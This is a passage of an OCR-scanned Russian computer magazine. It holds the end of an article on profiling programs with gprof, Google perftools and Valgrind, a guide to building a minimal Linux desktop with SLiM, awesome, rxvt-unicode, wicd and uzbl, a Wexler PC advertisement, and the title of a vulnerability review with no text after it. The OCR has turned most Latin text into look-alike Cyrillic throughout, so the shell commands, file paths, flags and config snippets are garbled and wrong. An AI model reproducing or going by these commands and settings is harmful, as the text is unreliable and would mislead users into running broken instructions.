СРІІРП0РІІ_Е_РРЕС!ІІЕІ\ІСѴ, так что точность можно увеличить в 
десять, сто или тысячу раз, если того требует ситуация (например, 
если необходимо профилировать исполнение очень небольшой 
программы). 

Несомненным достоинством ОРТ перед д р го \ является умение 
представлять информацию в графическом виде. Для активации 
этой функции рргоб следует запускать с флагом ' - -дѵ' (кстати, для 
показа графа будет использована одноименная утилита): 

$ доодіе-рргоі: --дѵ . /дгір дгір-сри-ргоіііе . Іод 

Генерируемый в результате выполнения этой функции граф вызовов 
функций очень наглядный и гораздо более простой для воспри- 
ятия и изучения, чем аналогичный текстовый граф, генерируемый 
командой дргоГ Имя и статистика исполнения каждой функции 
размещены в прямоугольниках, размер которых прямо пропорцио- 
нален количеству времени, затраченному на исполнение функции. 
Внутри прямоугольника размещены данные о том, сколько времени 
ушло на исполнение самой функции и ее потомков (время изме- 
ряется в проверках). Связи между прямоугольниками указывают 
на очередность вызова функций, а числовые значения, указанные 
рядом со связями — на время исполнения вызываемой функции и 
всех ее потомков. Еще одно достоинство ОРТ заключается в способ- 
ности использовать разные уровни детализации для вывода дан- 
ных, позволяя пользователю самому выбирать единицы дробления. 
По умолчанию в качестве такой единицы используется функция, 
поэтомулюбой вывод рргоб логически разделен на функции. 

Однако при желании в качестве единицы дробления можно исполь- 
зовать строки исходного кода (аргумент '--Ііпез'), файлы ('--Пез') 
или даже физические адреса памяти ( , --асIсIге55е5 , ). Благодаря та- 
кой функциональности ОРТ оченьудобно использовать для поиска 
узких мест в больших приложениях, когда сначала ты анализируешь 
производительность на уровне отдельных файлов, затем перехо- 
дишь к функциям и, наконец, находишь проблемное место на уровне 
исходного кода или адресов памяти. 
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Рис.6 ѴаІдгіпсІ с плагином саіідгіпсі 



И последнее. Как я говорил выше, ОРТ — это не только хороший 
профайлер, но и инструмент для поиска утечек памяти, поэтомуу 
него есть один приятный побочный эффект в виде способности к 
анализу потребления памяти приложением. Для этого приложение 
должно быть собрано или запущено с поддержкой библиотеки 
Істаііос, а в переменную НЕАРРР0РІІ_Е записан адрес для разме- 
щения профильного файла. Например: 

$ ББ_РКЕБ0АБ=/изг/1іЪ/1іЪкста11ос . зо. 0 . 0 . 0 \ 
НЕАРРК0РІЬЕ=д2Ір-Ьеар-рго^і1е . Іод \ 

. /дгір ~/иЪипки-10 . 10-сІезкСор-іЗ 86 . ізо 
Зкагкіпд кгаскіпд кке кеар 

Битріпд кеар ргокііе ко дгір-кеар-ргокііе . Іод . 0001 . 
кеар (Ехікіпд) 

К полученному файлу будет добавлено окончание ОООО.Ьеа р. 

Если натравить на этот файл утилиту рргоб и указать флаг '--Іехі', 
она выведет на экран таблицу функций и уровень потребления 
памяти каждой из них. Столбцы значат все то же самое, что и в 
случае обычного профилирования, стем исключением, что вместо 
количества проверок и их процентных отношений таблица теперь 
содержит количество потребляемой памяти и процент отобщего 
потребления памяти. 

При необходимости эту информацию можно получить в графичес- 
ком виде, а также изменить единицы дробления. Библиотека может 
быть настроена с помощью различных переменных окружения, 
наиболее полезная из которых носит имя НЕАР_РР0Е11_Е_ММАР. 
Она включает профилирование для системного вызова т тар (по 
умолчанию ОРТ собирает стати стику толь ко для вызовов таііос, 
са Нос, геа Нос и пеѵѵ). 

Пара слов о ѴаІдгіпсІ 

В последней части статьи мы кратко рассмотрим способы исполь- 
зования инструмента ѴаІдгіпсІ для профилирования приложений. 
ѴаІдгіпсІ — это очень мощный отладчик памяти, который способен 
найти такие ошибки работы с памятью, о которых другие утилиты 
даже не подозревают. 



Он имеет модульную архитектуру, которая стечением времени 
позволила ему обрасти несколькими плагинами, не относящимися 
напрямую котладке. Всего таких плагинатри: 

1. Сасбедгіпб — позволяет собирать статистику по попаданию 
данных и инструкций программы в кэш первого и второго уровней 
процессора (мощный и сложный инструмент, который полезен при 
выполнении профилирования низкоуровневого кода). 

2 . Маззіб — профайлер кучи, схожий по функциональности с анало- 
гом из пакета ОРТ. 

3. Саіідгіпсі — профайлер, во многом похожий натаковой в дргоі и ОРТ. 
По умолчанию в качестве основного плагина ѴаІдгіпсІ использует 
тетсЬеск (отладчик памяти), поэтому для его запуска в режиме 
профилирования необходимо указать нужный плагин вручную. 
Например: 

$ ѵаІдгіпсі --коо1 = са11дгіпсІ . /ргодгаш 

После этого в текущем каталоге будет создан файл с именем саіідгіпсі. 
оиІ.РЮ-программы, который можно проанализироватьс помощью 
утилиты саіід гіпсІ_а ппоіаіе или графической программы ксасбедгіпб 
(устанавливается отдельно). Я не буду расписывать формат гене- 
рируемых этими программами данных (он хорошо представлен в 
одноименных тап-страницах), скажулишь, что саІІдгіпб_аппоІаІе 
лучше запускать с флагом аиіо', чтобы он смогсамостоятельно 
найти файлы исходныхтекстов программы. Для анализа расхода 
памяти ѴаІдгіпсі следует за пускать с аргументом '--ІооІ=та55ІГ. После 
чего втекущем каталоге появится файл таззіЕоиІ.РЮ-программы, 
который можетбыть проанализирован с помощью утилиты тз_ргіпІ. 

В отличие отрргоі, она умеет выводить данные нетолько в виде стан- 
дартной таблицы, но и генерировать красивые азсіі-агі графики. 

Выводы 

Такие инструменты, как дргоТ, дсоѵ и ОРТ, позволяют провести 
анализ работы приложения и выявить все его узкие места вплоть 
до отдельной процессорной инструкции, а подключив к процессу 
профилирования еще и ѴаІдгіпсі, можно добиться удивительных 
результатов, т 
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Создаем гиковый десктоп из подручных материалов 



• Современные дистрибутивы Ыпих чрезмерно дружелюбны к 
новичкам и совершенно неэффективны в повседневном использовании. 
Следуя же нашим инструкциям, ты получишь минималистическое, 
быстрое и удобное окружение рабочего стола, как у многих гиков. 



Устанавливаем 
дисплейным менеджер 

Первый шагна пути к новому десктопу — установка дисплейного 
менеджера ЮМ), в задачи которого входитформирование графичес- 
кого окна с полями для ввода имени и пароля, а также запуск всех 
остальных компонентов ОБ. 

Наиболее продвинутые и удобные ОМ распространяются в комплекте 
с популярными десктопными средами, такими какКйЕ и бпоте, но в 
силу своей раздутости и адского количества зависимостей для нашего 
минималистичного десктопа они подходят плохо. Поэтому я выбрал 
легкий иудобный дисплейный менеджер 8І_іМ (Зітріе Бод I п Мападег). 
5І_іМ доступен в основном репозитории ІІЬипІи, поэтому его легко 
установитьс помощью любого арБклиента. В ходе установки необ- 



ходимо согласиться с предложением сделать 5І_іМ менеджером по 
умолчанию. Какой-либо дополнительной настройки нетребуется, но 
для удобства лучше изменить несколько строк конфигурационного 
файла. Открываем /еіс/зііт.сопб находим в самом начале опцию 
(МаиЦцэаПп и добавляем в конецее значения следующую запись 
(опции и значения разделены пробелом): 

: /зЬіп: /изг/зЬіп: /изг/ІосаІ/зЪіп 

Эта строка позволит использовать административные команды 
внутри ОБ. Далее находим опцию зеззіопз и указываем в качестве 
ее значения строку "беБии.аѵѵезоте.хІегт". Таку нас будет всего 
три типа сессии: прошлая, менеджер окон аѵѵезоте и голый хіегт 
(вместо кучи различных ѴѴМ). 
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Так выглядит зііт, 
простой и быстрый 
дисплейный менед- 
жер 



Выбираем 
менеджер окон 

Менеджер окон — ключевой компонентлюбого рабоче- 
го стола. Отего выбора зависит не только то, как будет 
выглядеть твой десктоп, но и множество других характе- 
ристик: способ расположения окон на экране, наличие 
или отсутствие панелей, системы меню, возможнос- 
ти заскриптовать действия, поддержка стандартов 
ітеесіезкіюр, наличиетрея и многое другое. 

Большинство современных менеджеров окон похожи 
друг на друга и предлагают пользователю сходный функ- 
ционал. РІихЬох, ѵѵіпбоѵѵтакег, кѵѵт, сотріг и огромное 
количество других ѴѴМ реализуют одну и туже модель 
перекрывающихся окон, болеетридцати лет назад 
предложенную компанией Хегох. Междутем многие 
пользователи уже давнозаметили, что модель непере- 
крывающихся окон (каждое из которых растягивается на 
все доступное пространство экрана) гораздо болееудобна 
для восприятия информации иуправления окнами. 
Менеджеры окон, реализующиетакую модель, называются 
тайловыми (отанглийского слова Іаіі — плитка, черепица). 
Они не столь популярны, какостальные, но по-настоящему 
ценятся в среде гиков. Всего существует около десятка 
тайловыхѴѴМ, среди которых есть каксовершенно мини- 
малистичные (например, гаіроізоп и бѵѵт),таки очень 
функциональные (іопЗ, аѵѵезоте). Болеетого, бытьтайло- 
вым умеет даже менеджер окон кѵѵт (начиная с КОЕ4.5). 
Для гиковского рабочего стола я выбрал менеджер окон 
аѵѵезоте. Он функционален и настраиваем, имеетвсе не- 
обходимое для жизни, включая панель управления, меню 
и трей, но самое главное — аѵѵезоте способен работать в 
разных режимах, начиная от классического (стандартные 
перекрывающиеся окна) и заканчивая десятком режимов 
с неперекрывающимися окнами. Каки все остальное, 
аѵѵезоте доступен в репозитории ІІЬипІи, поэтомуего 
можно установить с помощью арі-деЬ 

$ зисіо арб-дек іпзбаіі аѵѵезоте аѵ/езоте-ехбга 

Пакет аѵѵезоте-ехіга содержит дополнительные модули 
аѵѵезоте, они нам понадобятся при настройке, которую 
мы произведем в одном из следующих разделов. 

Настраиваем эмулятор 
терминала 

Трудно представить себе ІІІЧІХ-десктоп без эмулятора 
терминала, а гиковый десктоп — тем более. Ни один про- 



двинутый пользователь и дня не проживетбез термина- 
ла, набора самопальных скриптов и тс, поэтому к выбору 
замены хіегт нужно подходить со всей серьезностью. 
Существует масса различных эмуляторов терминалов, 
однако наиболее удобным в использовании и непри- 
тязательным ксистемным ресурсам я считаютерминал 
гхѵі-ипісобе. Он умеет все, что только может потребовать- 
ся оттерминала, и почти не имеетзависимостей. Кроме 
того, нам понадобится внятный моноширинный шрифт, 
удобочитаемый и не режущий глаз. На эту роль лучше всего 
подходит классический консольный шрифтіегтіпиз.уже 
многие годы восхваляемый ІІІМІХ-старожилами. 
Устанавливаем необходимые компоненты, плюс (во 
избежание путаницы) удаляем все остальные эмуляторы 
терминала из системы: 

$ зисіо арб-деб іпзбаіі гхѵб-ипісосіе \ 
х б опб з - б е гші пи з 

$ зисіо арб-деб гешоѵе хбегт дпоте-бегтіпаі 
Создаем файл -/.Хсіе^аиііз и пишем в него настройки: 

$ ѵі ~/ .Хсіебаиібз 

! Для совместимости прикидываемся хбегт 
ІЖхѵС*ЦегтЫаше : хбегт 
! Желтый ненавязчивый фон 
ІЖхѵб*Ьаскдгоипс1: #е0е0ас 
! Черные буквы 
ІЖхѵб* богедгоипб : Віаск 
! Отключаем скроллбар 
ІЖхѵб *зсго11Ваг : баізе 

! Небольшой отступ от краев окна для лучшего 
восприятия 

иКхѵб*іпбегпаІВогс1ег : 5 
! Наш шрифт 

ІЖхѵб . бопб : хбб : Тегшіпиз : зізе=14 

Все. Осталосьтолько установить менеджер сетевых 
подключений, и можно считать, что каркас будущего 
десктопа готов. 

Менеджер сетевых 
подключении 

Без интернета жить нельзя, поэтому мы должны разо- 
браться стем, каксобираемся к нему подключаться. По 
умолчанию в ІІЬипІи установлен менеджер соединений 
ІМеІѵѵогкМападег, но после переезда в собственный БЕ 




> іпіо 

• Предложенный 

в статье интерфейс 
как нельзя лучше 
подходит для 
нетбуков, на 
экранах которых 
многооконный (да 
еще и управляемый 
мизерным тачпадом) 
интерфейс выглядит 
несколько странно. 

• Особенно удобным 
браузер игЫ 
становится после 
активации механизма 
подписи ссылок, 
который доступен 

по команде (іі* — 
отключить). После 
его включения 
напротив каждой 
ссылки появляется 
число, введя которое, 
ты попадешь на 
адресуемую ссылкой 
страницу. 

• Браузер игЫ 
можно безгранично 
расширять 

с помощью скриптов, 
большое количество 
которых можно найти 
на страничке ѵѵѵѵѵѵ. 
игЫ.огд/ѵѵікі/зсгіріз . 

• В любой момент 
тему ОТК-приложений 
можно поменять 

с помощью 
программы дік- 
{Ьете-зѵѵксЬ 
(дополнительные 
темы находятся 
в пакетах дік2-еп- 
діпез-*). 




НТТР://ѴѴѴШ 

■ г 

> Ііпкз 

• аѵѵезоте.падиасІаЬ 
огд/уѵікі/Цзег Соп- 
ІгіЬіДесІ ѴѴісІдеІз 

— виджеты для 
аѵѵезоте; 

• аѵѵезоте.падиасІаЬ 
огд/уѵікі/ВеаиЬ- 

іи I іЬетез — темы 
для аѵѵезоте. 
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Три окна и классический режим их расположения 



перед нами встанетвыбор, продолжатели использовать его, поме- 
нять на другой или настраивать все вручную. 

Я предлагаю остановиться на менеджере подключений ѵѵіссі, который 
мне кажется более удобным и стабильным, а ктомуже имеет консоль- 
ный интерфейс. Установим его, заодноудалив ЫеІѵѵогкМападег: 



$ зисіо арС-деС гегпоѵе пеСѵгогк-тападег 
$ зисіо арС-деС іпзСаІІ ѵѵіссі міссі-сигзез ѵѵіссі-сіі 



Установщикавтоматически пропишетѵѵісб в автозапуск, поэтому 
после перезагрузки нам останется только запустить клиент. 

Собираем все вместе 

Теперь у нас есть четыре основных компонента рабочего стола, 
поэтому мы уже можем начать его использовать. Проще всего 
это сделать, просто перезагрузив машину. После этого на экране 
должно появиться окно зІіт. Нажимаем <Р1 > (чтобы выбрать сессию 
аѵѵезоте), вводим имя и пароль. На экране появится аѵѵезоте в 
своем дефолтовом виде (смотри скриншот). 

Начинаем медитировать. Строка сверху — это статус-бар, его задача — 
показыватьтекущее состояние менеджера окон и управлять им (несмот- 
ря на ориентированность на клавиатурноеуправление, аѵѵезоте можно 
контролировать с помощью мыши). Квадратный значок с его левой сто- 
роны — стандартная кнопка меню, с помощью которой можно запускать 
приложения иуправлятьѴѴМ. Меню можно вызвать без использования 
мыши, просто нажав комбинацию <ѴѴіп+ѴѴ>. Последовательность цифр 
оті до 9, расположенная сразуза кнопкой меню — это такназываемые 
теги, аналоги виртуальных рабочих столов в других ѴѴМ. Между ними 
можно переключаться мышкой или комбинацией <ѴѴіп+номер>. С 
правой стороны расположен индикатор те кущей раскладки окон (о нем 



мы поговорим чутьпозже), перед ним — часы, а передчасами —трей (он 
не виден, пока в него не будетсвернуто приложение). Между списком 
тегов итреем располагается стандартныйтаск-лист, показывающий от- 
крытые в данный моментокна (приложения). Сами приложения можно 
запускать тремя разными способами: 

1. Через меню; 

2 . С помощью горячих клавиш (например, комбинация <ѴѴіп+ЕпІег> 
за пускает терм и нал); 

3. Через строку запуска, доступную по нажатию <ѴѴіп+Р> (аналогокна 
запуска по <АИ+Р2> в других ѴѴМ, появляется прямо в статус-баре, 
рядом со списком тегов, поддерживает историю и автодополнение). 
Переключение между приложениями с одним тегом (то есть рас- 
положенными на одном виртуальном рабочем столе) осуществля- 
ется с помощью комбинаций <ѴѴіп+Ч> (вперед), <ѴѴіп+К> (назад) и 
<ѴѴіп+ТаЬ> (между двумя последними). 

Поумолчанию аѵѵезоте работает в классическом режиме, позволяя 
таскать окна по экрану и накладывать их друг на друга. Однако все из- 
менится после нажатия комбинации <ѴѴіп+пробел>, которая переведет 
менеджер окон втайловый режим: все окна окажутся на экране, деля 
его между собой. 

Если окно одно — оно займет весь экран, два окна поделятэкран на две 
части по вертикали, три — натри части и так далее. Аѵѵезоте умеет рас- 
полагатьокна более чем десятком различныхспособов, переключаться 
между которыми можно с помощью клика по индикатору раскладки в 
правой стороне статус-бара (левый клик— вперед, правый — назад), 
либоспомощью всетойже клавиатурной комбинации <ѴѴіп+пробел> 
(вперед) или <ѴѴіп+5Ьі1і:+пробел> (назад). Оченьтрудно объяснить 
различия междувсеми раскладками, поэтому рекомендую хорошенько 
поэкспериментировать. Добавлюлишь, что наиболее практичными я 
считаютри из НИХ: 

1. Плавающие окна. Первая и дефолтовая раскладка. Реализует модель 
обычных перекрывающихся окон, которые можно спокойнотаскать по 
экрану с помощью комбинации <ѴѴіп+левая кнопка мыши>, изменять 
размере помощью <АИ+правая кнопка мыши> и накладывать друг на 
друга. Идеально подходит для многооконных приложений (таких как 
дітр) и для людей, которые не могут привыкнуть ктайлингу. 

2 . Первый слева, все остальные справа. Вторая по счету раскладка, 
она оченьудобна для открытия множества терминалов (в одном Іор, в 
другом ЬазЬ, в третьем — ігс-клиент и так далее). 

3. Все окна на максимум. Третья с конца раскладка, которая распахи- 
вает все открытые окна на полный экран (они как бы наложены друг на 
друга). Оченьудобна для запуска больших графических приложений, 
требующих много пространства: браузеры, таіі-клиенты, редакторы, 
таблицы и прочие. 
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В любой момент выбранное окно можно минимизировать с помощью 
клавиатурной комбинации <ѴѴіп+І\І>, растянуть на весьэкран с помо- 
щью <ѴѴіп+М> р сделать плавающим, нажав <ѴѴіп+СМ+Пробел> или 
закрыть — <ѴѴіп+5Ы11+С>. Ширинуокон можно изменятьс помощью 
<ѴѴіп+Н> (больше) и <ѴѴіп+І_> (меньше). 

Этой информации будет вполне достаточно, чтобы приступить к 
использованию аѵѵезоте, нодлятого, чтобы почувствовать всю его 
мощь, не обойтись без правильного конфигурационного файла. В 
аѵѵезоте используется языксценариев Іиа, с помощью которого 
происходит как настройка менеджера окон под свои нужды, так и 
его расширение (на Іиа можно написать плагин практически любой 
сложности и прозрачно интегрировать его в менеджер окон). И хотя Іиа 
— очень простой язык(он напоминаетсильноурезанный баѵаБсгірі), 
написанные на нем конфигурационные файлы получаются довольно 
длинными и сильно запутанными. Поэтому я уже подготовил хороший 
конфигурационный файл и выложил его на нашем диске. Ниже мы 
кратко пробежимся по его основным разделам. 

В самом начале файла находится ряд директив гециіге, подклю- 
чающих дополнительные Іиа-библиотеки. Кним я добавил строку 
гециіге(«ѵісіоиз»), ответственную за подключение библиотеки ѵісіоиз, 
которая реализует интерфейс подключаемых виджетов ^терминоло- 
гии аѵѵезоте виджеты это просто элементы статус-бара, отображаю- 
щие какую-либо информацию). 

Далее происходитинициализациятемы менеджера окон с помощью 
функции ЬеаибМ.іпіІ:. Я поменял стандартную тему на более светлую, 
ноты можешь выбрать другую, просто указав каталогтемы в качестве 
аргумента функции (поумолчаниютемы аѵѵезоте лежат в каталоге 
/изг/збаге/аѵѵезотеДЬетез/). 

Ниже происходитустановка значений стандартных опций, таких как 
дефолтовый эмулятор терминала, редактор, тобкеу (это клавиша, 
присутствующая во всех клавиатурных комбинациях аѵѵезоте — по 
умолчанию ѴѴіп, обозначенная в конфиге как Моб4). Далее идетпе- 
речисление доступных раскладококон, названия стандартных те го в, 
инициализация меню, статус-бара, виджетов, установка стандартных 
клавиатурных комбинаций (кстати, я поменял комбинацию закрытия 
окна на <СігІ+0>, она мне кажется болееудобной) и индивидуальные 
настройки приложений. В целомжурнале не хватит места, чтобы 
описать, как все это работает, поэтому я остановлюсьтолько на двух 
важных моментах: виджетах и индивидуальных настройках приложе- 
ний. В приведенном конфиге статус-бар отображает пять виджетов: 
скоростьскачивания/загрузки по сети (для ѴѴі-Рі), нагрузка на процес- 
сор, заполненность памяти, уровень заряда батареи и текущий уровень 
громкости (кстати, по нему можно кликать, чтобы уменьшать и увеличи- 
вать громкость). Ты можешьудалить или добавить новые виджеты, но 
тебе придется самому разбираться, какэто сделать (благо в интернете 
есть немало руководств на русском, посвященных этому вопросу). 
Раздел конфига, обозначенный комментарием «— {{{ Риіез», предна- 
значен для настройки поведения окон отдельно взятых приложений. 
Его особенноудобно использовать, чтобы сделать окна выбранных 
приложений по умолчанию плавающими. Например, если мы хотим, 
чтобы окно плеера аисіасіоиз не растягивалось на весьэкран, а всегда 
открывалось, какв обычных ѴѴМ, то мы должны добавить следующий 
блок в этот раздел (сразу за предыдущей подобной записью): 

{ гиіе = { сіазз = " Аисіасіоиз2 " }, 

ргорегДіез = { бІоаДіпд = Дгие } } , 

Имя класса (в данном случае «АисІасіои52») можно получить, введя в 
терминале команду «хргор I дгер 1Ш_СЬА85» и кликнув по окну 
нужного приложения. 

С менеджером окон все. Теперь необходимо настроить автозапуск 
приложений (нам нужно запускать хотя бы клиентѵѵіссі), переклю- 
чение раскладки клавиатуры (отказавшись от ЭЕ, мы потеряли эту 
возможность) и автомонтирование сменных накопителей (еще одна 
вкусность БЕ). 

Первая задача самая простая. Все, что требуется сделать для ее 




Так выглядит аѵѵезоте по умолчанию 



решения, это просто прописать нужные команды в файл -/.хзеззіоп, 
добавив в их конец знак Таким же образом решается и задача 
настройки переключения клавиатуры, а сам -/.хзеззіоп в оконча- 
тельном виде приобретает следующий вид: 

$ ѵі -/.хзеззіоп 

# Міссі будет висеть в трее 
ѵдіссі-сііепі: & 

# Раскладка РУС-АНГЛ с включением по САР8ЛОСК 

# и индикацией с помощью светодиода на клавиатуре 
зебхкЬшар "из,ги" " ,мл_пкеуз" " дгр : сарв_Ьодд1е " & 

# Запуск ММ 
ехес аѵѵезоте 

Автомонтирование флешек проще всего реализовать с помощью 
демона Ьаіеѵі, который работаетабсолютно прозрачно для пользо- 
вателя и не требует настройки. Достаточно установить одноименный 
пакет в систему и добавить запуск демона в тотже .хзеззіоп (строка 
«рдгер Ьаіеѵі >> /беѵ/пиіі 1 1 Ьаіеѵі &» прямо перед «ехес аѵѵезоте») и 
убрать его из автозапуска на системном уровне: 

$ зисіо гш /ек с/ гс {2,3,4,51 . сі/82 0Ь.а1еѵ1: 

Флешки будут монтироваться с флагом зупс, поэтому перед извле- 
чением их не нужно размонтировать. Найти содержимое можно в 
каталоге /тебіа/метка-фс (или/тебіа/бізк, если ФС не имеетметки). 

Браузер 

Рабочий стол без браузера практически бесполезен, поэтому самое 
время подумать отом, как мы собираемся открывать веб-сайты. 

В II N IX существует огромное количество всевозможных браузеров, 
начиная отминималистичныхтекстовых и заканчивая огромными 
тяжелыми комбайнами с множеством зависимостей. Однако среди них 
естьтолько один браузер, идеально вписывающийся в наше графи- 
ческое окружение. Браузер игЬКотанглийского слова изаЫе — удоб- 
ный) появился как идея создать веб-обозреватель, неуклонно следуя 
традициям II N IX, поэтомуто, что получилось в результате, выглядит 
очень непохожим на все остальные браузеры. Во-первых, игЫ состоит 
из нескольких независимых программ, каждая из которых выполняет 
только одну функцию: игЫ-соге отвечаетза загрузку и рендерингстра- 
ниц (в его недрах движокѴѴеЬКіі), игЫ-соокіе-баетоп сохраняети от- 
дает соокіе, игЫ-Ьгоѵѵзег создает графический интерфейс, игЫ-ІаЬЬеб 
добавляет к интерфейсу табы. Все остальные компоненты реализованы 
в виде подключаемых скриптов. Интерфейс браузера очень скромный 
и кроме статус-бара не содержит ни кнопок, ни адресной строки. Все 
управление происходитлибо через минимальное меню, доступное по 
нажатию правой кнопки мыши, л ибо с помощью специальной системы 
команд и закрепленных за ними быстрых клавиш. Во многом команды 
и быстрые клавиши похожи на свои аналоги в редакторе Ѵіт, поэтому 
те, кто предпочитаютэтоттекстовый редактор, быстро освоятся в и гЫ. 
Для остальных поясню: большинство действий в игЫсовершается 
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с помощью одинарных нажатий на клавишу. Например, клавиша <г> 
перезагружает страницу, а <о> — открывает новую. Они существенно 
удобнее стандартных клавиатурных комбинаций сзадействованием 
клавиши <СМ>, но накладываютсвой отпечатокна стиль работы с брау- 
зером: каждый раз, когда придется использовать формы веб-страницы 
для ввода каких-либо данных, придется нажимать клавишу <і>, которая 
переведет браузер втакназываемый «режим ввода», при этом все горя- 
чие клавиши отключаются, и клавиатура начинает работать в обычном 
режиме. Выход из режима ввода осуществляется нажатием <Езс>. 
Браузер имеет довольно большое количество команд, поэтому их 
придется заучить. Наиболее используемые команды относятся к 
навигации и работе с те кущей страницей: 

игЫ: навигация по странице 

Ъ. з к 1 — перемещение страницы (влево, вниз, вверх, 
вправо) 

« — перейти к концу страницы 
» — перейти к началу страницы 
+ — изменение масштаба 

1 2 — изменение масштаба между стандартным и большим 
/ ? — поиск (вперед, назад) 

п N — переход между результатами поиска (вперед, назад) 

3 — остановить загрузку страницы 
г — перезагрузить страницу 

На втором месте находятся команды, предназначенные для навига- 
ции по сайтам: 

игЫ: навигация по сайтам 

о — открыть новую страницу (после нажатия необходимо 
ввести ІШЬ ) 

О — открыть новую страницу, отредактировав адрес теку- 
щей 

р — перейти на страницу, адрес которой находится в буфе- 
ре обмена 

дд — ввести поисковый запрос доодіе 
Ь — перейти к предыдущей странице 
п — перейти к следующей странице 



Особое место занимают команды для перехода между табами (они 
работаюттолько в игЫ-ІаЬЬесІ): 

игЫ: переход между табами 

дп — создать новую вкладку 

до — создать новую вкладку и ввести адрес сайта 

дС — закрыть текущую вкладку 

д< — перейти к первой вкладке 

д> — перейти к последней вкладке 

дб — к следующей вкладке 

дТ — к предыдущей вкладке 

ді — к указанной вкладке 

Кроме всего перечисленного, игЫ имеет довольно интересную систе- 
музакладок, навигация по которой осуществляется с помощью меток. 
Ты просто нажимаешь <СМ+Ь>, вводишь метку, итекущая страница 
сохраняется в закладках. Вновь открыть ее можно, нажав <и>, введя 
имя метки и выбрав страницу с помощью клавиши <ТаЬ> (эта функ- 
циональность реализована с помощью бтепи, который содержится 
в пакете зискіезз-іооіз). Клавиша <ІІ> позволяеттаким же образом 
загрузить страницу из истории. Для выхода из браузера и спол ьзуется 
двойное нажатие клавиши <І>. 

Настройки браузера хранятся в файле .сопбд/игЫ/сопбд, исправлен- 
ный вариант которого есть на диске (кстати, я убрал все настройки, 
связанные стабами, так какаѵѵезоте сам предоставляеттакую функ- 
циональность). Он проств понимании и достаточно хорошо докумен- 
тирован, поэтому разобраться будет нетрудно. 



Что дальше? 



Теперьу нас есть базовое окружение рабочего стола, который, тем 
не менее, еще нельзя использовать каждодневно. Для нормального 
существования понадобится ворох приложений. Опытным путем было 
выяснено, что с рабочим столом лучше всего сочетается следующее ПО: 

• ГОХ-ЙІѲГ- минималистичный, но оченьудобный графический 
файловый менеджер (в качестве альтернативы можно использовать 
чуть бол ее тяжел ы й Тб и па г из ХРСЕ); 

• (д)ѵіт — редактор-легенда, выбор всех гиков (да, есть еще етасз); 

• аЬіѵУОГСІ — редактор офисных документов (хотя можно использо- 
вать босз.доодіе.сот ] ; 

• гаіНига — минималистичный ридер РОЕ-документов суправлени- 
ем в стиле ѵіпп (в качестве более простой в понимании альтернативы 
можно задействовать еѵіпсе); 

• тріауег — видеопроигрыватель, не имеет графического интер- 
фейса, поэтому оченьудобен (ктомуже показывает все, что только 
подсунут); 

• аисІасІ0и$2 — аудиоплеер с простым и удобным интерфейсом (в 
моем конфиге аѵѵезоте уже есть настройка для него, поэтому будет 
открываться в небольшом окне посередине экрана); 

•ГПуН*— невероятноудобный консольный таіі-клиент (требует 
много времени для привыкания и конфигурирования, поэтому может 
бытьзаменен на дтаіі); 

• тсаЬЬѳг — лучший консольный )аЬЬег-клиент (как вариант, можно 
использовать более дружелюбный ІкаЬЬег); 

• *еН — минималистичный и очень быстрый просмотрщик изображе- 
ний; 

•ЗСГОІ*— консольная утилита для снятия скриншотов; 

• ЬііГП — простая и оченьудобная резалка дисков, работающая в ре- 
жиме командной строки (в качестве легкой графической альтернативы 
сгодится хІЪигп изХЕСЕ). ц-ц 
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ШШШМЕ 903 

Много лет назад мы все заморачивались покупкой комьютера по частям и самостоятельно 
собирали его, посмеиваясь над производителями готовых сборок (и непременно теми, 
кто их покупает). Мол, и железо они подбирают не оптимальное, и продают втридорога. 
Романтика ЬапсІусгаТі'а давно ушла, пришел простой расчет. Оказалось, что готовые сборки с 
установленной системой зачастую обходятся дешевле, чем собирать компьютер самому. Легче 
пойти в магазин и купить компьютер с классной конфигурацией за хорошую цену. В случае 
с ѴѴЕХІ.ЕР.НОМЕ 903 с 64-битной ѴѴіпсІоѵѵз® 7 на борту ты получаешь практически топовую 
машину, которая идеально подойдет для игр. 




В качестве процессора используется мощный двухядерный процес- 
сор Іпіеі® Соге™ І5-650 с частотой 3,2 ГГц и кэш-памятью 4 Мб. СРІІ 
имеет встроенный контроллер памяти и поддерживает технологию 
ТигЬо Воозі, автоматически разгоняющую его под нагрузкой (напри- 
мер, в последних играх). Более того, такие процессоры поставляют- 
ся еще и со встроенным контроллером памяти. 

Видео 

За игровые возможности отвечают две видеокарты ОеРогсе 6ТХ 460, 
основанные на новейшей вычислительной архитектуре «Регті». 
Благодаря высокой производительности в режиме БігесіХ 11 тес- 
селяции процессор 6ТХ 460 обеспечивает идеально четкую гра- 
фику без ущерба для скорости, а поддержка технологий ІМѴЮІА ЗБ 
Ѵізіоп™, РЬузХ® и США™ позволяет визуализировать все самые 
потрясающие эффекты, на которые способны компьютерные игры. 
Просто выставляй настройки графики на максимум. 

ОЗУ 

Компьютер ѴѴЕХІ_ЕР.НОМЕ 903 укомплектован оперативной памятью 
4 Гб, работающей в двухканальном режиме. Благодаря этому работа 



с каждым из двух установленных модулей памяти осуществляется 
параллельно. Пускай технология и не дает теоретического увеличе- 
ния пропускной способности в два раза, но, тем не менее, вносит 
ощутимый результат. 

Блок питания 

Набор мощного железа не может обойтись без надежного пита- 
ния. В ѴѴЕХІ_ЕР.НОМЕ электропитание осуществляется с помощью 
надежного блока питания мощностью 750 Вт. Это даже больше, чем 
нужно, но зато обеспечивает хороший запас надежности. 

Софт 

На всех компьютерах ѴѴЕХБЕР.НОМЕ 903 предустановлена операци- 
онная система ѴѴіпсІоѵѵз® 7 Домашняя расширенная. Использование 
именно 64-битной версии не случайно: благодаря этому удается 
задействовать все 4 Гб установленной в компьютере памяти. Помимо 
ОС, дополнительно установлен бесплатный антивирус Місгозо^® 
Эесигііу Еззепбаіз и ОГГісе 2010 Эіагіег (включает в себя ограничен- 
ный функционал ѴѴогб® и Ехсеі®, для активации полнофункциональ- 
ной версии необходимо приобрести ключ продукта). 



Місгозоіі 




Домашняя расширенная 



Мы рекомендуем подлинную ОС ѴѴіпсІоѵѵз® 7. 



шсхшг 

♦ 



ЗАО «БТК» — официальный дистрибутор 
техники ѴѴЕХІ.ЕР в России 
Единая служба поддержки ѴѴехІег: 

+7 ( 800 ) 200-9660 

ѵѵѵѵѵѵ.ѵѵехіег.ги 



© Владельцем товарного знака Місгозо!!® и логотипа ѴѴіпсІоѵѵз® 7, зарегистрированных на территории США и/или других стран, и владельцем авторских прав 
на его дизайн является корпорация МісгозоЙ®. 



РЕКЛАМА 





Уязвим 
и очень раним 

Обзор самых опасных и интересных уязвимостей 
в бЫй/Ыпихза последнее время 



